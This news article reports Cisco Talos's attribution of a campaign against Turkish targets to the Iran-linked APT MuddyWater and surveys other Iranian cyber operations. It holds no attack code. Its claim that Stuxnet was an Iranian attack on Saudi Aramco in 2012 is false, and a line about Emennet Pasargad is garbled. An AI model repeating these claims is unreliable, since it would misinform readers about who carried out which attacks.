Malicious campaign targeting Turkey found to be connected with Iran
In the past five years, security experts have highlighted Iran as the key threat actor behind various attacks. Iranian hackers have executed various malicious operations for achieving the objectives of the State directly or indirectly. And, this still continues to be the case.
The most recent of such operation has been exposed by Cisco Talos. The intelligence group discovered that a new malicious campaign is been launched targeting high profiles of Turkey. As per the security researchers MuddyWater (also known as Mercury or Static Kitten), an advanced persistent threat (APT) group with ties to Iran’s Ministry of Intelligence and Security (MOIS), has been linked to campaigns against private organizations in Turkey and government personnel.
The analysis done by security researchers indicate that the targeted campaigns designed malevolent PDFs, XLS files, and windows executables to deploy malicious PowerShell- based downloader’s acting as primary footholds into the target’s enterprises.
The APT Group has found to be operational since 2017 and has been linked to various attacks that took place in the US, Israel, Europe, and the Middle East in the past. The malicious activities of the group have been acknowledged globally. US Cyber Command warned that MuddyWater is one of many groups “conducting Iranian intelligence activities.”
Iran has also deployed other methods of extracting intelligence about its rivals earlier to meet its state objectives earlier also.
Back in October 2021, two Iranian natives were employed by Emennet Pasargad for computer intrusion, computer fraud, voter intimidation, interstate threats, and conspiracy offenses for their suspected participation in an operation aimed at influencing and interfering with the 2020 US presidential Elections. The FBI has issued an alert detailing the tools, techniques, and tactics of an Iranian group, giving US organizations guidelines to preserve against Iran’s malicious Cyber activities.
Last year Iranian hacking group “Lyceum” targets Israel, Saudi Arabia, Morocco, Tunisia, and others in Africa. The methods of attacks used in the campaign resembled tactics, formerly accredited to hacking operations connected with the DNSpionage Group.
In July 2021, the Cybereason Nocturnus and Incident Response team responded to Iranian- associated Operation Ghostshell, an extremely- targeted Cyber-surveillance campaign targeting the Aerospace and Telecommunications industries exclusively in the Middle East, with supplementary sufferers in the U.S., Russia, and Europe.
Iran was also behind the 2012 Stuxnet virus spread, causing Saudi Aramco (Saudi Arabian Oil Co), and RasGas (Qatari natural gas producer). The virus removed hard drives and even displayed a burning picture of the US flag on computer screens. In response, Saudi Aramco had to Shut- down its network and smashed over 30,000 computers.
Despite of various exposures of state sponsored intelligence extraction campaigns by Iran, the country has not toned down its offensive operation in the region and even globally. And, trends suggest that it plans to continue such operations in future too with the same intensity given its growing self-sufficient Cyber offensive capabilities.
